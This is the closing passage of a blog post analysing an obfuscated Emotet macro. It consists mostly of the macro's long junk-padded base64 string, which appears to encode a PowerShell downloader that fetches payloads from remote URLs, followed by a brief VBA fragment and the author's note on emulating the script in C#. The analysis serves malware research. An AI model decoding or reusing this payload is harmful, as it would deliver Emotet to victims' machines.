21u7gsgggAJwAr58[sn ]]][ jsa 21u7gsgggACcAZ58[sn ]]][ jsa 21u7gsgggwAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsgggpAHQA58[sn ]]][ jsa 21u7gsgggYQAnA58[sn ]]][ jsa 21u7gsgggCsAJw58[sn ]]][ jsa 21u7gsgggBsAG058[sn ]]][ jsa 21u7gsgggAYQBy58[sn ]]][ jsa 21u7gsgggAGsAZ58[sn ]]][ jsa 21u7gsgggQAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsggg0AGkA58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcAbg58[sn ]]][ jsa 21u7gsgggBnAGI58[sn ]]][ jsa 21u7gsgggAbABv58[sn ]]][ jsa 21u7gsgggAGcAJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcAZwA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwBlA58[sn ]]][ jsa 21u7gsgggHIAcw58[sn ]]][ jsa 21u7gsgggAuACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAGMAb58[sn ]]][ jsa 21u7gsgggwAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsgggtAC8A58[sn ]]][ jsa 21u7gsgggZQAnA58[sn ]]][ jsa 21u7gsgggCsAJw58[sn ]]][ jsa 21u7gsgggBsACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAGoAd58[sn ]]][ jsa 21u7gsgggQAvAC58[sn ]]][ jsa 21u7gsgggcAKwA58[sn ]]][ jsa 21u7gsgggnAEEA58[sn ]]][ jsa 21u7gsgggbwA1A58[sn ]]][ jsa 21u7gsgggEkASg58[sn ]]][ jsa 21u7gsgggB5AC858[sn ]]][ jsa 21u7gsgggAKgAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwBoAH58[sn ]]][ jsa 21u7gsgggQAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggdAAnA58[sn ]]][ jsa 21u7gsgggCsAJw58[sn ]]][ jsa 21u7gsgggBwADo58[sn ]]][ jsa 21u7gsgggALwAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwAvAH58[sn ]]][ jsa 21u7gsgggIAZQB58[sn ]]][ jsa 21u7gsgggjAHUA58[sn ]]][ jsa 21u7gsgggcABlA58[sn ]]][ jsa 21u7gsgggHIAYQ58[sn ]]][ jsa 21u7gsgggBhACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAHQAd58[sn ]]][ jsa 21u7gsgggQBwAG58[sn ]]][ jsa 21u7gsgggEAcgB58[sn ]]][ jsa 21u7gsggglAGoA58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcAYQ58[sn ]]][ jsa 21u7gsgggAnACs58[sn ]]][ jsa 21u7gsgggAJwAu58[sn ]]][ jsa 21u7gsgggAGMAJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcAbwB58[sn ]]][ jsa 21u7gsgggtACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggC8AJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAQQBy58[sn ]]][ jsa 21u7gsgggAGMAa58[sn ]]][ jsa 21u7gsgggABpAH58[sn ]]][ jsa 21u7gsgggYAbwB58[sn ]]][ jsa 21u7gsgggzACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggHYAaQ58[sn ]]][ jsa 21u7gsgggBlAGo58[sn ]]][ jsa 21u7gsgggAbwBz58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAC58[sn ]]][ jsa 21u7gsggg8AJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggdAB3A58[sn ]]][ jsa 21u7gsgggC8AKg58[sn ]]][ jsa 21u7gsgggBoAHQ58[sn ]]][ jsa 21u7gsgggAJwAr58[sn ]]][ jsa 21u7gsgggACcAd58[sn ]]][ jsa 21u7gsgggAAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsgggwADoA58[sn ]]][ jsa 21u7gsgggLwAnA58[sn ]]][ jsa 21u7gsgggCsAJw58[sn ]]][ jsa 21u7gsgggAvAHc58[sn ]]][ jsa 21u7gsgggAdwB358[sn ]]][ jsa 21u7gsgggAC4AJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcAbAB58[sn ]]][ jsa 21u7gsggghAGkA58[sn ]]][ jsa 21u7gsgggYgByA58[sn ]]][ jsa 21u7gsgggCcAKw58[sn ]]][ jsa 21u7gsgggAnAGE58[sn ]]][ jsa 21u7gsgggAeQAu58[sn ]]][ jsa 21u7gsgggAGMAb58[sn ]]][ jsa 21u7gsgggwBtAC58[sn ]]][ jsa 21u7gsggg8AYgA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwBsA58[sn ]]][ jsa 21u7gsgggG8AJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAZwAv58[sn ]]][ jsa 21u7gsgggAE4AO58[sn ]]][ jsa 21u7gsgggQB6AC58[sn ]]][ jsa 21u7gsggg8AJwA58[sn ]]][ jsa 21u7gsgggpAC4A58[sn ]]][ jsa 21u7gsgggIgBTA58[sn ]]][ jsa 21u7gsgggGAAUA58[sn ]]][ jsa 21u7gsgggBMAGk58[sn ]]][ jsa 21u7gsgggAdAAi58[sn ]]][ jsa 21u7gsgggACgAW58[sn ]]][ jsa 21u7gsgggwBjAG58[sn ]]][ jsa 21u7gsggggAYQB58[sn ]]][ jsa 21u7gsgggyAF0A58[sn ]]][ jsa 21u7gsgggNAAyA58[sn ]]][ jsa 21u7gsgggCkAOw58[sn ]]][ jsa 21u7gsgggAkAEI58[sn ]]][ jsa 21u7gsgggAbwA358[sn ]]][ jsa 21u7gsgggAG8Ab58[sn ]]][ jsa 21u7gsgggwBxAG58[sn ]]][ jsa 21u7gsggg0APQA58[sn ]]][ jsa 21u7gsgggoACcA58[sn ]]][ jsa 21u7gsgggRwBmA58[sn ]]][ jsa 21u7gsgggGQAJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAcQBv58[sn ]]][ jsa 21u7gsgggADgAM58[sn ]]][ jsa 21u7gsgggQAnAC58[sn ]]][ jsa 21u7gsgggkAOwB58[sn ]]][ jsa 21u7gsgggmAG8A58[sn ]]][ jsa 21u7gsgggcgBlA58[sn ]]][ jsa 21u7gsgggGEAYw58[sn ]]][ jsa 21u7gsgggBoACg58[sn ]]][ jsa 21u7gsgggAJABZ58[sn ]]][ jsa 21u7gsgggAGIAe58[sn ]]][ jsa 21u7gsggggBtAG58[sn ]]][ jsa 21u7gsggg4AeAB58[sn ]]][ jsa 21u7gsgggqACAA58[sn ]]][ jsa 21u7gsgggaQBuA58[sn ]]][ jsa 21u7gsgggCAAJA58[sn ]]][ jsa 21u7gsgggBMAGQ58[sn ]]][ jsa 21u7gsgggAdwBl58[sn ]]][ jsa 21u7gsgggAGEAY58[sn ]]][ jsa 21u7gsgggQBnAC58[sn ]]][ jsa 21u7gsgggkAewB58[sn ]]][ jsa 21u7gsggg0AHIA58[sn ]]][ jsa 21u7gsgggeQB7A58[sn ]]][ jsa 21u7gsgggCQAQg58[sn ]]][ jsa 21u7gsgggB3AGE58[sn ]]][ jsa 21u7gsgggAMQBz58[sn ]]][ jsa 21u7gsgggADgAZ58[sn ]]][ jsa 21u7gsgggAAuAC58[sn ]]][ jsa 21u7gsgggIAZAB58[sn ]]][ jsa 21u7gsgggPAHcA58[sn ]]][ jsa 21u7gsgggbgBgA58[sn ]]][ jsa 21u7gsgggGwATw58[sn ]]][ jsa 21u7gsgggBBAEQ58[sn ]]][ jsa 21u7gsgggAYABG58[sn ]]][ jsa 21u7gsgggAEkAY58[sn ]]][ jsa 21u7gsgggABMAE58[sn ]]][ jsa 21u7gsgggUAIgA58[sn ]]][ jsa 21u7gsgggoACQA58[sn ]]][ jsa 21u7gsgggWQBiA58[sn ]]][ jsa 21u7gsgggHoAbQ58[sn ]]][ jsa 21u7gsgggBuAHg58[sn ]]][ jsa 21u7gsgggAagAs58[sn ]]][ jsa 21u7gsgggACAAJ58[sn ]]][ jsa 21u7gsgggABFAG58[sn ]]][ jsa 21u7gsggg8ANAB58[sn ]]][ jsa 21u7gsgggnADEA58[sn ]]][ jsa 21u7gsgggMAB6A58[sn ]]][ jsa 21u7gsgggCkAOw58[sn ]]][ jsa 21u7gsgggAkAFI58[sn ]]][ jsa 21u7gsgggAZAA158[sn ]]][ jsa 21u7gsgggAHcAO58[sn ]]][ jsa 21u7gsgggAB2AG58[sn ]]][ jsa 21u7gsggg8APQA58[sn ]]][ jsa 21u7gsgggoACcA58[sn ]]][ jsa 21u7gsgggUwBiA58[sn ]]][ jsa 21u7gsgggGEAbw58[sn ]]][ jsa 21u7gsgggBoACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggADAAZ58[sn ]]][ jsa 21u7gsgggAAnAC58[sn ]]][ jsa 21u7gsgggkAOwB58[sn ]]][ jsa 21u7gsgggJAGYA58[sn ]]][ jsa 21u7gsgggIAAoA58[sn ]]][ jsa 21u7gsgggCgAJg58[sn ]]][ jsa 21u7gsgggAoACc58[sn ]]][ jsa 21u7gsgggARwBl58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAH58[sn ]]][ jsa 21u7gsgggQALQB58[sn ]]][ jsa 21u7gsgggJACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggHQAZQ58[sn ]]][ jsa 21u7gsgggBtACc58[sn ]]][ jsa 21u7gsgggAKQAg58[sn ]]][ jsa 21u7gsgggACQAR58[sn ]]][ jsa 21u7gsgggQBvAD58[sn ]]][ jsa 21u7gsgggQAZwA58[sn ]]][ jsa 21u7gsgggxADAA58[sn ]]][ jsa 21u7gsgggegApA58[sn ]]][ jsa 21u7gsgggC4AIg58[sn ]]][ jsa 21u7gsgggBMAGA58[sn ]]][ jsa 21u7gsgggARQBu58[sn ]]][ jsa 21u7gsgggAGAAZ58[sn ]]][ jsa 21u7gsgggwBUAG58[sn ]]][ jsa 21u7gsggggAIgA58[sn ]]][ jsa 21u7gsggggAC0A58[sn ]]][ jsa 21u7gsgggZwBlA58[sn ]]][ jsa 21u7gsgggCAAMw58[sn ]]][ jsa 21u7gsgggA3ADg58[sn ]]][ jsa 21u7gsgggANAAx58[sn ]]][ jsa 21u7gsgggACkAI58[sn ]]][ jsa 21u7gsgggAB7AC58[sn ]]][ jsa 21u7gsgggYAKAA58[sn ]]][ jsa 21u7gsgggnAEkA58[sn ]]][ jsa 21u7gsgggbgB2A58[sn ]]][ jsa 21u7gsgggG8Aaw58[sn ]]][ jsa 21u7gsgggBlAC058[sn ]]][ jsa 21u7gsgggASQAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwB0AG58[sn ]]][ jsa 21u7gsgggUAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggbQAnA58[sn ]]][ jsa 21u7gsgggCkAKA58[sn ]]][ jsa 21u7gsgggAkAEU58[sn ]]][ jsa 21u7gsgggAbwA058[sn ]]][ jsa 21u7gsgggAGcAM58[sn ]]][ jsa 21u7gsgggQAwAH58[sn ]]][ jsa 21u7gsgggoAKQA58[sn ]]][ jsa 21u7gsggg7ACQA58[sn ]]][ jsa 21u7gsgggWQAzA58[sn ]]][ jsa 21u7gsgggG0AZA58[sn ]]][ jsa 21u7gsgggBsAGM58[sn ]]][ jsa 21u7gsgggANQA958[sn ]]][ jsa 21u7gsgggACgAJ58[sn ]]][ jsa 21u7gsgggwBKAH58[sn ]]][ jsa 21u7gsggggAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggMABjA58[sn ]]][ jsa 21u7gsgggG8ANg58[sn ]]][ jsa 21u7gsgggAxACc58[sn ]]][ jsa 21u7gsgggAKQA758[sn ]]][ jsa 21u7gsgggAGIAc58[sn ]]][ jsa 21u7gsggggBlAG58[sn ]]][ jsa 21u7gsgggEAawA58[sn ]]][ jsa 21u7gsggg7ACQA58[sn ]]][ jsa 21u7gsgggWgA5A58[sn ]]][ jsa 21u7gsgggHUAeg58[sn ]]][ jsa 21u7gsgggBpAG058[sn ]]][ jsa 21u7gsgggAcwA958[sn ]]][ jsa 21u7gsgggACgAJ58[sn ]]][ jsa 21u7gsgggwBSAC58[sn ]]][ jsa 21u7gsgggcAKwA58[sn ]]][ jsa 21u7gsgggnAHkA58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcAbg58[sn ]]][ jsa 21u7gsgggBxADA58[sn ]]][ jsa 21u7gsgggAcQBr58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggQB9AH58[sn ]]][ jsa 21u7gsggg0AYwB58[sn ]]][ jsa 21u7gsggghAHQA58[sn ]]][ jsa 21u7gsgggYwBoA58[sn ]]][ jsa 21u7gsgggHsAfQ58[sn ]]][ jsa 21u7gsgggB9ACQ58[sn ]]][ jsa 21u7gsgggARgB058[sn ]]][ jsa 21u7gsgggAHIAZ58[sn ]]][ jsa 21u7gsggggBuAG58[sn ]]][ jsa 21u7gsgggoAbwA58[sn ]]][ jsa 21u7gsggg9ACgA58[sn ]]][ jsa 21u7gsgggJwBBA58[sn ]]][ jsa 21u7gsgggHEAdA58[sn ]]][ jsa 21u7gsgggAnACs58[sn ]]][ jsa 21u7gsgggAJwA558[sn ]]][ jsa 21u7gsgggAHEAZ58[sn ]]][ jsa 21u7gsggggBsAC58[sn ]]][ jsa 21u7gsgggcAKQA58[sn ]]][ jsa 21u7gsggg="


Func4 = Func3(l_var1)


End Function

Next Steps

This was the final step in the initial task of getting the code to a readable state. However, this was not good enough for me. I needed to be able to run the code to see what it did. Instead of running the macro, I wanted complete control over it.

In the next post, I will show the process of re-writing this script in a C# console application. Doing this allowed me to execute the script and step through it to see what each command was doing. If that sounds like fun to you, be sure to join me for the follow on, Emulating Emotet In C#.

2 thoughts on “Reading an Obfuscated Emotet Script

Leave a Reply